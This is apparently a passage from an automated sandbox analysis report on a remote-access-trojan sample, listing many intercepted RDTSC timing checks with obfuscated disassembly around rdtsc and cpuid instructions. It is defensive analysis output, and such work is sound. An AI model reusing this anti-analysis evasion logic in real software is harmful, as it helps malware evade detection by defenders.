0x00000077 mov eax, dword ptr [esp] 0x0000007a stc 0x0000007b jle 00007F8AB0DEE984h 0x0000007d jnle 00007F8AB0DEE96Ch 0x0000007f cmp esi, edx 0x00000081 call 00007F8AB0DEE966h 0x00000086 lea ecx, dword ptr [00000000h+edx*4] 0x0000008d mov cx, 4E80h 0x00000091 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4B1091 second address: 4AAC43 instructions: 0x00000000 rdtsc 0x00000002 rcl edx, cl 0x00000004 jmp 00007F8AB1593EFFh 0x00000006 jne 00007F8AB1593E47h 0x00000008 mov ax, ss 0x0000000a lea edx, dword ptr [00000000h+eax*4] 0x00000011 push eax 0x00000012 jmp 00007F8AB1593A13h 0x00000017 pop ss 0x00000018 pushfd 0x00000019 jmp 00007F8AB1594356h 0x0000001e pop dword ptr [esi] 0x00000020 mov ecx, dword ptr [esp] 0x00000023 bt edx, ecx 0x00000026 jmp 00007F8AB1593ED6h 0x00000028 jp 00007F8AB1593E70h 0x0000002a call 00007F8AB1593EBAh 0x0000002f jmp 00007F8AB158D9BAh 0x00000034 pushad 0x00000035 push word ptr [esp+06h] 0x0000003a jbe 00007F8AB1593E78h 0x0000003c lea esp, dword ptr [esp+02h] 0x00000040 jmp 00007F8AB1593E7Ch 0x00000042 lea edx, dword ptr [edi+50h] 0x00000045 xchg eax, ecx 0x00000046 mov eax, dword ptr [esp] 0x00000049 stc 0x0000004a jle 00007F8AB1593ED4h 0x0000004c jnle 00007F8AB1593EBCh 0x0000004e cmp esi, edx 0x00000050 call 00007F8AB1593EB6h 0x00000055 lea ecx, dword ptr [00000000h+edx*4] 0x0000005c mov cx, 4E80h 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 499A83 second address: 499A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE938h 0x00000004 xchg cx, ax 0x00000007 adc cx, dx 0x0000000a call 00007F8AB0DEE964h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4C6876 second address: 4C6A49 instructions: 0x00000000 rdtsc 0x00000002 neg dl 0x00000004 mov eax, ecx 0x00000006 jmp 00007F8AB159405Ch 0x0000000b lea edi, dword ptr [edi+0005040Bh] 0x00000011 lea eax, dword ptr [CD6A2DD3h] 0x00000017 mov edx, 9C0D1359h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4D99A3 second address: 48810D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE8DBh 0x00000004 sub ebp, 08h 0x00000007 pushfd 0x00000008 lea esp, dword ptr [esp] 0x0000000b jmp 00007F8AB0DEE9A0h 0x0000000d mov dword ptr [ebp+00h], edx 0x00000010 mov dh, al 0x00000012 sub esp, 18h 0x00000015 jnl 00007F8AB0DEE97Eh 0x00000017 jmp 00007F8AB0DEE93Ah 0x00000019 xchg eax, ecx 0x0000001a bsr dx, si 0x0000001e jnc 00007F8AB0DEE979h 0x00000020 clc 0x00000021 cmc 0x00000022 mov dword ptr [ebp+04h], ecx 0x00000025 mov dx, word ptr [esp] 0x00000029 lea edx, dword ptr [00000000h+edx*4] 0x00000030 jmp 00007F8AB0D9D10Eh 0x00000035 neg eax 0x00000037 jl 00007F8AB0DEE8B2h 0x0000003d jmp 00007F8AB0DEE92Dh 0x0000003f mov ecx, dword ptr [esp] 0x00000042 bsf cx, cx 0x00000046 neg ah 0x00000048 jmp 00007F8AB0DEE931h 0x0000004a lea ecx, dword ptr [edi+50h] 0x0000004d clc 0x0000004e jp 00007F8AB0DEE96Dh 0x00000050 mov dl, C2h 0x00000052 mov dh, byte ptr [esp] 0x00000055 rcl dx, cl 0x00000058 jmp 00007F8AB0DEE99Eh 0x0000005a mov ah, ch 0x0000005c jmp 00007F8AB0DEE92Dh 0x0000005e cmp ebp, ecx 0x00000060 jl 00007F8AB0DEE991h 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4D6526 second address: 4D65FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593ED0h 0x00000004 neg cl 0x00000006 lea eax, dword ptr [C399C3E4h] 0x0000000c lea eax, dword ptr [ecx+0000D6D8h] 0x00000012 lea eax, dword ptr [eax+esi] 0x00000015 jmp 00007F8AB1593EBDh 0x00000017 not cl 0x00000019 bswap eax 0x0000001b mov dx, ax 0x0000001e mov dx, word ptr [esp] 0x00000022 bsr ax, dx 0x00000026 jmp 00007F8AB1593EEEh 0x00000028 jle 00007F8AB1593E58h 0x0000002a lea eax, dword ptr [edi-7CF34C86h] 0x00000030 shr dh, cl 0x00000032 jmp 00007F8AB1593E7Ah 0x00000034 add cl, FFFFFF99h 0x00000037 push edx 0x00000038 mov ax, word ptr [esp+02h] 0x0000003d mov dh, 51h 0x0000003f push ax 0x00000041 jmp 00007F8AB1593EBBh 0x00000043 xchg dword ptr [esp], eax 0x00000046 lea esp, dword ptr [esp+02h] 0x0000004a lea esp, dword ptr [esp+04h] 0x0000004e sub cl, FFFFFF88h 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4D6540 second address: 4D65FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE966h 0x00000004 neg cl 0x00000006 lea eax, dword ptr [C399C3E4h] 0x0000000c lea eax, dword ptr [ecx+0000D6D8h] 0x00000012 lea eax, dword ptr [eax+esi] 0x00000015 jmp 00007F8AB0DEE96Dh 0x00000017 not cl 0x00000019 bswap eax 0x0000001b mov dx, ax 0x0000001e mov dx, word ptr [esp] 0x00000022 bsr ax, dx 0x00000026 jmp 00007F8AB0DEE99Eh 0x00000028 jle 00007F8AB0DEE908h 0x0000002a lea eax, dword ptr [edi-7CF34C86h] 0x00000030 shr dh, cl 0x00000032 jmp 00007F8AB0DEE92Ah 0x00000034 add cl, FFFFFF99h 0x00000037 push edx 0x00000038 mov ax, word ptr [esp+02h] 0x0000003d mov dh, 51h 0x0000003f push ax 0x00000041 jmp 00007F8AB0DEE96Bh 0x00000043 xchg dword ptr [esp], eax 0x00000046 lea esp, dword ptr [esp+02h] 0x0000004a lea esp, dword ptr [esp+04h] 0x0000004e sub cl, FFFFFF88h 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 479B98 second address: 479C13 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, dword ptr [esp] 0x00000005 call 00007F8AB1593ED8h 0x0000000a lea eax, dword ptr [edi+0000880Fh] 0x00000010 mov cx, dx 0x00000013 mov cx, word ptr [esp] 0x00000017 rcl ecx, 0Ch 0x0000001a jmp 00007F8AB1593EC5h 0x0000001c add al, ch 0x0000001e xchg dword ptr [esp], ebx 0x00000021 not edx 0x00000023 mov cl, dh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 479C13 second address: 4CFDF2 instructions: 0x00000000 rdtsc 0x00000002 lea eax, dword ptr [ecx-00004680h] 0x00000008 jmp 00007F8AB0E44AE6h 0x0000000d lea ebx, dword ptr [ebx+49h] 0x00000010 lea eax, dword ptr [ebx+esi] 0x00000013 dec edx 0x00000014 lea edx, dword ptr [eax+ebp] 0x00000017 xchg dx, ax 0x0000001a pushad 0x0000001b jmp 00007F8AB0DEE92Ch 0x0000001d xchg dword ptr [esp+20h], ebx 0x00000021 mov ax, si 0x00000024 lea edx, dword ptr [ecx+000000CEh] 0x0000002a shr dx, cl 0x0000002d jmp 00007F8AB0DEE986h 0x0000002f cmc 0x00000030 mov eax, dword ptr [esp] 0x00000033 push dword ptr [esp+20h] 0x00000037 retn 0024h 0x0000003a not ch 0x0000003c sub esp, 1Ah 0x0000003f jl 00007F8AB0E44B2Bh 0x00000045 jnl 00007F8AB0E44B85h 0x0000004b lea esp, dword ptr [esp+02h] 0x0000004f call 00007F8AB0DEE90Dh 0x00000054 xchg dx, cx 0x00000057 not ax 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4D42B5 second address: 4D42D0 instructions: 0x00000000 rdtsc 0x00000002 mov edx, dword ptr [esp] 0x00000005 and ah, 0000007Ah 0x00000008 xchg dword ptr [esp], ebp 0x0000000b jmp 00007F8AB1593F12h 0x0000000d bsf ax, dx 0x00000011 bswap edx 0x00000013 mov edx, 76495E28h 0x00000018 pushfd 0x00000019 lea ebp, dword ptr [ebp-0000001Bh] 0x0000001f bswap edx 0x00000021 jmp 00007F8AB1593E1Ch 0x00000026 mov ah, byte ptr [esp] 0x00000029 sub esp, 08h 0x0000002c dec dh 0x0000002e mov al, cl 0x00000030 xchg dword ptr [esp+0Ch], ebp 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4D42D0 second address: 4D431F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE979h 0x00000004 bsr dx, dx 0x00000008 bsf edx, esp 0x0000000b mov edx, 770EE750h 0x00000010 mov ah, dh 0x00000012 push dword ptr [esp+0Ch] 0x00000016 retn 0010h 0x00000019 mov cx, word ptr [ebp+00h] 0x0000001d mov eax, E6083829h 0x00000022 jmp 00007F8AB0DEE962h 0x00000024 pushfd 0x00000025 rcl dl, cl 0x00000027 jnl 00007F8AB0DEE9ABh 0x00000029 xchg dx, ax 0x0000002c jmp 00007F8AB0DEE9D1h 0x0000002e sub ebp, 02h 0x00000031 xchg dh, dl 0x00000033 lea edx, dword ptr [ebx-0000352Ah] 0x00000039 mov dx, D04Ah 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4D431F second address: 4D4367 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593EE0h 0x00000004 add word ptr [ebp+04h], cx 0x00000008 not eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4E9BCB second address: 4E9CC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE92Dh 0x00000004 not dword ptr [ebp+00h] 0x00000007 mov ax, CF5Ah 0x0000000b push ecx 0x0000000c shr dh, 00000005h 0x0000000f jmp 00007F8AB0DEE9C0h 0x00000011 jle 00007F8AB0DEE966h 0x00000013 mov cx, word ptr [ebp+00h] 0x00000017 add eax, 9FCEE7F0h 0x0000001c jnc 00007F8AB0DEE96Dh 0x0000001e jc 00007F8AB0DEE96Bh 0x00000020 call 00007F8AB0DEE966h 0x00000025 pop dx 0x00000027 jmp 00007F8AB0DEE91Fh 0x00000029 mov dh, al 0x0000002b lea esp, dword ptr [esp+02h] 0x0000002f jmp 00007F8AB0DEE97Dh 0x00000031 sub ebp, 02h 0x00000034 mov dx, 8960h 0x00000038 xchg eax, edx 0x00000039 mov edx, dword ptr [esp] 0x0000003c jmp 00007F8AB0DEE9A0h 0x0000003e or word ptr [ebp+04h], cx 0x00000042 xchg ax, dx 0x00000044 lea edx, dword ptr [edx-00000AEDh] 0x0000004a mov ax, word ptr [esp] 0x0000004e jmp 00007F8AB0DEE91Eh 0x00000050 pushfd 0x00000051 pop dword ptr [ebp+00h] 0x00000054 lea edx, dword ptr [00000000h+edx*4] 0x0000005b mov edx, 457163FEh 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 48AF3C second address: 48B06E instructions: 0x00000000 rdtsc 0x00000002 lea esp, dword ptr [esp+03h] 0x00000006 call 00007F8AB1593E81h 0x0000000b jmp 00007F8AB1593EC5h 0x0000000d sub esp, 02h 0x00000010 neg ax 0x00000013 xchg dx, ax 0x00000016 rol edx, 1Ah 0x00000019 lea esp, dword ptr [esp+02h] 0x0000001d xchg dword ptr [esp], esi 0x00000020 jmp 00007F8AB1593EB7h 0x00000022 xchg ax, dx 0x00000024 sub esp, 04h 0x00000027 btr dx, bx 0x0000002b xchg word ptr [esp+01h], dx 0x00000030 mov dx, word ptr [esp+02h] 0x00000035 lea esi, dword ptr [esi+67h] 0x00000038 jmp 00007F8AB1593EF2h 0x0000003a lea eax, dword ptr [00000000h+ebp*4] 0x00000041 mov dh, ah 0x00000043 mov eax, esp 0x00000045 sub esp, 15h 0x00000048 lea esp, dword ptr [esp+01h] 0x0000004c xchg dword ptr [esp+18h], esi 0x00000050 jmp 00007F8AB1593E74h 0x00000052 mov ah, byte ptr [esp] 0x00000055 pushad 0x00000056 push ecx 0x00000057 push dword ptr [esp+3Ch] 0x0000005b retn 0040h 0x0000005e xor cl, FFFFFFC2h 0x00000061 bsr eax, ebx 0x00000064 jmp 00007F8AB1593EF1h 0x00000066 jp 00007F8AB1593EB6h 0x00000068 mov ax, si 0x0000006b mov dx, word ptr [esp] 0x0000006f jmp 00007F8AB1593F00h 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4E9C00 second address: 4E9D14 instructions: 0x00000000 rdtsc 0x00000002 call 00007F8AB0DEE934h 0x00000007 mov ecx, ebx 0x00000009 shr dh, 00000004h 0x0000000c mov ecx, EECE932Dh 0x00000011 mov dx, word ptr [esp] 0x00000015 jmp 00007F8AB0DEEA94h 0x0000001a xchg dword ptr [esp], esi 0x0000001d xchg edx, ecx 0x0000001f mov ax, di 0x00000022 lea edx, dword ptr [edx+edi] 0x00000025 mov dx, si 0x00000028 lea esi, dword ptr [esi-0000005Dh] 0x0000002e jmp 00007F8AB0DEE908h 0x00000030 dec ax 0x00000032 lea ecx, dword ptr [F092C92Eh] 0x00000038 xchg dword ptr [esp], esi 0x0000003b mov ecx, dword ptr [esp] 0x0000003e not eax 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4E9D14 second address: 4E9CC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593E22h 0x00000004 push dword ptr [esp] 0x00000007 retn 0004h 0x0000000a not dword ptr [ebp+00h] 0x0000000d mov ax, CF5Ah 0x00000011 push ecx 0x00000012 shr dh, 00000005h 0x00000015 jmp 00007F8AB1593F10h 0x00000017 jle 00007F8AB1593EB6h 0x00000019 mov cx, word ptr [ebp+00h] 0x0000001d add eax, 9FCEE7F0h 0x00000022 jnc 00007F8AB1593EBDh 0x00000024 call 00007F8AB1593EB6h 0x00000029 pop dx 0x0000002b jmp 00007F8AB1593E6Fh 0x0000002d mov dh, al 0x0000002f lea esp, dword ptr [esp+02h] 0x00000033 jmp 00007F8AB1593ECDh 0x00000035 sub ebp, 02h 0x00000038 mov dx, 8960h 0x0000003c xchg eax, edx 0x0000003d mov edx, dword ptr [esp] 0x00000040 jmp 00007F8AB1593EF0h 0x00000042 or word ptr [ebp+04h], cx 0x00000046 xchg ax, dx 0x00000048 lea edx, dword ptr [edx-00000AEDh] 0x0000004e mov ax, word ptr [esp] 0x00000052 jmp 00007F8AB1593E6Eh 0x00000054 pushfd 0x00000055 pop dword ptr [ebp+00h] 0x00000058 lea edx, dword ptr [00000000h+edx*4] 0x0000005f mov edx, 457163FEh 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52A404 second address: 52A493 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 mov ax, word ptr [esp+01h] 0x00000008 lea edx, dword ptr [esi+45980130h] 0x0000000e mov dword ptr [esp], edi 0x00000011 jmp 00007F8AB0DEE922h 0x00000013 mov dx, word ptr [esp] 0x00000017 mov ax, 82A6h 0x0000001b mov dl, ah 0x0000001d jmp 00007F8AB0DEEB13h 0x00000022 lea edi, dword ptr [00000000h+ecx*4] 0x00000029 mov dx, word ptr [esp] 0x0000002d lea eax, dword ptr [esp+69177B39h] 0x00000034 pop edi 0x00000035 mov ax, bp 0x00000038 setle dl 0x0000003b jmp 00007F8AB0DEE810h 0x00000040 not dx 0x00000043 push edx 0x00000044 xchg dh, al 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52A493 second address: 52A499 instructions: 0x00000000 rdtsc 0x00000002 push word ptr [esp] 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D0C3 second address: 52D156 instructions: 0x00000000 rdtsc 0x00000002 lea eax, dword ptr [ebp+1Eh] 0x00000005 bsf bp, sp 0x00000009 pop dx 0x0000000b jmp 00007F8AB0DEE927h 0x0000000d mov edi, 6144D9A9h 0x00000012 mov word ptr [esp+01h], bx 0x00000017 add esp, 01h 0x0000001a jmp 00007F8AB0DEE96Eh 0x0000001c lea ecx, dword ptr [ecx+3F6DD35Ch] 0x00000022 lea esi, dword ptr [esp+0000F508h] 0x00000029 mov byte ptr [esp], dl 0x0000002c mov eax, dword ptr [esp] 0x0000002f not cl 0x00000031 mov ebp, dword ptr [esp] 0x00000034 jmp 00007F8AB0DEE9EBh 0x00000039 xchg ebp, esi 0x0000003b mov byte ptr [esp+01h], cl 0x0000003f mov dx, word ptr [esp] 0x00000043 mov dh, 38h 0x00000045 mov di, word ptr [esp] 0x00000049 sub esp, 14h 0x0000004c jmp 00007F8AB0DEE8F0h 0x0000004e xchg bp, dx 0x00000051 pop word ptr [esp+12h] 0x00000056 push word ptr [esp+03h] 0x0000005b pop edi 0x0000005c cmc 0x0000005d mov si, dx 0x00000060 jmp 00007F8AB0DEE91Eh 0x00000062 cmc 0x00000063 push dword ptr [esp+03h] 0x00000067 cld 0x00000068 add esp, 06h 0x0000006b neg dh 0x0000006d pop eax 0x0000006e jmp 00007F8AB0DEE98Eh 0x00000070 sub esp, 11h 0x00000073 mov word ptr [esp+18h], bp 0x00000078 pop dword ptr [esp+13h] 0x0000007c cpuid 0x0000007e push dword ptr [esp+19h] 0x00000082 cpuid 0x00000084 jmp 00007F8AB0DEE926h 0x00000086 dec cx 0x00000088 xchg bp, di 0x0000008b or dh, FFFFFFF5h 0x0000008e pop cx 0x00000090 pop cx 0x00000092 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D156 second address: 52D1B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1594038h 0x00000007 clc 0x00000008 rcl di, cl 0x0000000b bts ax, di 0x0000000f shl al, 00000000h 0x00000012 lea edx, dword ptr [00000000h+eax*4] 0x00000019 bswap esi 0x0000001b jmp 00007F8AB1593D84h 0x00000020 mov ebx, BC6819FEh 0x00000025 mov ebp, dword ptr [esp+15h] 0x00000029 mov cl, ah 0x0000002b btr ax, di 0x0000002f xchg dword ptr [esp+12h], edi 0x00000033 add ah, cl 0x00000035 jmp 00007F8AB1593E51h 0x00000037 not ah 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D48E second address: 52D476 instructions: 0x00000000 rdtsc 0x00000002 mov ah, byte ptr [esp] 0x00000005 mov dh, byte ptr [esp] 0x00000008 jmp 00007F8AB1593E7Ah 0x0000000a mov al, byte ptr [esp] 0x0000000d lea esp, dword ptr [esp] 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D476 second address: 52D543 instructions: 0x00000000 rdtsc 0x00000002 dec cl 0x00000004 not edx 0x00000006 std 0x00000007 jmp 00007F8AB0DEF090h 0x0000000c mov byte ptr [esp], bl 0x0000000f neg al 0x00000011 pushad 0x00000012 mov ebx, esi 0x00000014 xchg bp, bx 0x00000017 mov al, 3Bh 0x00000019 jmp 00007F8AB0DEE2C3h 0x0000001e stc 0x0000001f pop edi 0x00000020 xchg dword ptr [esp+07h], ebp 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D543 second address: 52D798 instructions: 0x00000000 rdtsc 0x00000002 bt edx, ecx 0x00000005 sub esp, 10h 0x00000008 jmp 00007F8AB1593E33h 0x0000000a xchg word ptr [esp+26h], si 0x0000000f lea ebx, dword ptr [00000000h+esi*4] 0x00000016 setnl dh 0x00000019 mov word ptr [esp+29h], cx 0x0000001e lea ecx, dword ptr [00000000h+eax*4] 0x00000025 lea eax, dword ptr [esp-000000ECh] 0x0000002c jmp 00007F8AB1593E52h 0x0000002e lea edi, dword ptr [esi+ebp] 0x00000031 std 0x00000032 xchg word ptr [esp+01h], bx 0x00000037 cld 0x00000038 mov ecx, ebp 0x0000003a mov dx, bp 0x0000003d jmp 00007F8AB1593EA6h 0x0000003f xchg dword ptr [esp+03h], esi 0x00000043 mov byte ptr [esp+19h], dl 0x00000047 call 00007F8AB1593EE9h 0x0000004c xchg cx, bx 0x0000004f popad 0x00000050 push word ptr [esp+08h] 0x00000055 pop ebx 0x00000056 jmp 00007F8AB1593E80h 0x00000058 cpuid 0x0000005a pop dx 0x0000005c sub esp, 00000000h 0x0000005f xchg dword ptr [esp+06h], eax 0x00000063 sbb bx, 6906h 0x00000068 jmp 00007F8AB1593EB2h 0x0000006a mov di, word ptr [esp+07h] 0x0000006f call 00007F8AB15941CEh 0x00000074 mov di, word ptr [esp+01h] 0x00000079 lea edx, dword ptr [ebp+00002BDCh] 0x0000007f pushfd 0x00000080 mov di, ax 0x00000083 pop word ptr [esp+0Fh] 0x00000088 jmp 00007F8AB1593DBEh 0x0000008d bsf bp, sp 0x00000091 xchg word ptr [esp+0Eh], bp 0x00000096 pop bp 0x00000098 mov ch, 02h 0x0000009a mov ch, dl 0x0000009c rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D798 second address: 52D551 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE75Eh 0x00000007 xchg dh, al 0x00000009 mov bx, cx 0x0000000c lea esi, dword ptr [ebx-7Fh] 0x0000000f pop si 0x00000011 mov ax, 8CB8h 0x00000015 lea edi, dword ptr [esp+0000A102h] 0x0000001c jmp 00007F8AB0DEE8FEh 0x0000001e rcr dl, 00000007h 0x00000021 xchg bp, cx 0x00000024 btc bp, di 0x00000028 lea ebx, dword ptr [edi+000012C5h] 0x0000002e pop bp 0x00000030 bsr bp, cx 0x00000034 jmp 00007F8AB0DEE91Ch 0x00000036 mov dx, D781h 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D551 second address: 52D6C5 instructions: 0x00000000 rdtsc 0x00000002 std 0x00000003 mov ch, byte ptr [esp+0Ah] 0x00000007 mov al, byte ptr [esp+05h] 0x0000000b mov byte ptr [esp+06h], dl 0x0000000f jmp 00007F8AB1593EC3h 0x00000011 pop edx 0x00000012 pop word ptr [esp+01h] 0x00000017 call 00007F8AB1593EA6h 0x0000001c mov eax, ebp 0x0000001e mov bh, AAh 0x00000020 mov bl, ah 0x00000022 add esp, 03h 0x00000025 jmp 00007F8AB1593EDDh 0x00000027 mov edi, dword ptr [esp+01h] 0x0000002b not ax 0x0000002e pop edi 0x0000002f mov edi, ebp 0x00000031 ror al, cl 0x00000033 bt edx, ebp 0x00000036 jmp 00007F8AB1593E7Bh 0x00000038 push word ptr [esp+03h] 0x0000003d cld 0x0000003e dec dl 0x00000040 mov ah, bl 0x00000042 pop word ptr [esp+01h] 0x00000047 jmp 00007F8AB1593F97h 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D6C5 second address: 52D667 instructions: 0x00000000 rdtsc 0x00000002 xchg bp, ax 0x00000005 lea esi, dword ptr [eax-000000E4h] 0x0000000b pop word ptr [esp] 0x0000000f clc 0x00000010 mov bp, sp 0x00000013 jmp 00007F8AB0DEE8A8h 0x00000018 push word ptr [esp] 0x0000001c mov eax, dword ptr [esp+02h] 0x00000020 mov byte ptr [esp+02h], cl 0x00000024 setp bh 0x00000027 xchg ebp, eax 0x00000029 xchg eax, ebx 0x0000002a jmp 00007F8AB0DEE90Ah 0x0000002c xchg dh, ah 0x0000002e sub esp, 1Eh 0x00000031 mov byte ptr [esp+12h], cl 0x00000035 xchg byte ptr [esp+1Eh], cl 0x00000039 not bh 0x0000003b mov byte ptr [esp+0Ah], bl 0x0000003f jmp 00007F8AB0DEE927h 0x00000041 lea eax, dword ptr [66EDA811h] 0x00000047 lea edi, dword ptr [00000000h+ebx*4] 0x0000004e popad 0x0000004f stc 0x00000050 jmp 00007F8AB0DEE96Ch 0x00000052 mov ecx, dword ptr [esp] 0x00000055 push cx 0x00000057 xchg bx, cx 0x0000005a add esp, 02h 0x0000005d mov word ptr [esp], di 0x00000061 std 0x00000062 jmp 00007F8AB0DEE989h 0x00000064 bsr bp, ax 0x00000068 clc 0x00000069 setbe bh 0x0000006c sub esp, 1Fh 0x0000006f mov ah, dl 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D667 second address: 52D64F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593E7Bh 0x00000004 lea edi, dword ptr [esi-0000E5A0h] 0x0000000a cmc 0x0000000b not bh 0x0000000d cpuid 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52DA6F second address: 52DAB0 instructions: 0x00000000 rdtsc 0x00000002 not bl 0x00000004 lea edx, dword ptr [00000000h+edi*4] 0x0000000b cpuid 0x0000000d cpuid 0x0000000f mov eax, edx 0x00000011 jmp 00007F8AB0DEE913h 0x00000013 cpuid 0x00000015 bt edi, esi 0x00000018 mov di, 4DFBh 0x0000001c bsr edi, edi 0x0000001f btr edx, esi 0x00000022 inc eax 0x00000023 call 00007F8AB0DEE956h 0x00000028 jmp 00007F8AB0DEE98Fh 0x0000002a not ah 0x0000002c mov byte ptr [esp+01h], ch 0x00000030 sub esp, 04h 0x00000033 mov bl, byte ptr [esp+02h] 0x00000037 neg ecx 0x00000039 mov cx, 9377h 0x0000003d jmp 00007F8AB0DEE927h 0x0000003f cpuid 0x00000041 bsf eax, eax 0x00000044 neg bx 0x00000047 xchg eax, ebp 0x00000048 mov si, E8D3h 0x0000004c mov bp, dx 0x0000004f jmp 00007F8AB0DEE981h 0x00000051 clc 0x00000052 xchg dword ptr [esp+01h], edx 0x00000056 push di 0x00000058 sub esp, 00000000h 0x0000005b sub esp, 12h 0x0000005e clc 0x0000005f jmp 00007F8AB0DEE92Ch 0x00000061 bsr ebx, ebp 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52E047 second address: 52DC15 instructions: 0x00000000 rdtsc 0x00000002 pop di 0x00000004 cld 0x00000005 rol eax, 07h 0x00000008 mov bx, word ptr [esp] 0x0000000c jmp 00007F8AB1593D26h 0x00000011 xchg ebp, esi 0x00000013 mov dl, cl 0x00000015 push word ptr [esp+01h] 0x0000001a not bh 0x0000001c xchg word ptr [esp], si 0x00000020 bswap ecx 0x00000022 jmp 00007F8AB1593C93h 0x00000027 inc edx 0x00000028 xchg dh, ch 0x0000002a lea esp, dword ptr [esp+04h] 0x0000002e xchg ebx, esi 0x00000030 mov bl, D7h 0x00000032 xchg ebx, edi 0x00000034 jmp 00007F8AB1593E34h 0x00000036 setb ch 0x00000039 dec bx 0x0000003b call 00007F8AB1593E15h 0x00000040 xchg bp, cx 0x00000043 lea esp, dword ptr [esp+01h] 0x00000047 mov word ptr [esp+01h], si 0x0000004c lea esp, dword ptr [esp+03h] 0x00000050 jmp 00007F8AB1593E67h 0x00000052 lea esi, dword ptr [esp+000000B2h] 0x00000059 sete al 0x0000005c stc 0x0000005d std 0x0000005e xchg al, cl 0x00000060 call 00007F8AB1593EF4h 0x00000065 pushfd 0x00000066 jmp 00007F8AB1593E50h 0x00000068 pop word ptr [esp+04h] 0x0000006d mov al, dh 0x0000006f setl dh 0x00000072 sub esp, 0Dh 0x00000075 bsr esi, esp 0x00000078 jmp 00007F8AB1593EB8h 0x0000007a mov ecx, edx 0x0000007c lea ebp, dword ptr [B1C33945h] 0x00000082 xchg di, bp 0x00000085 rdtsc
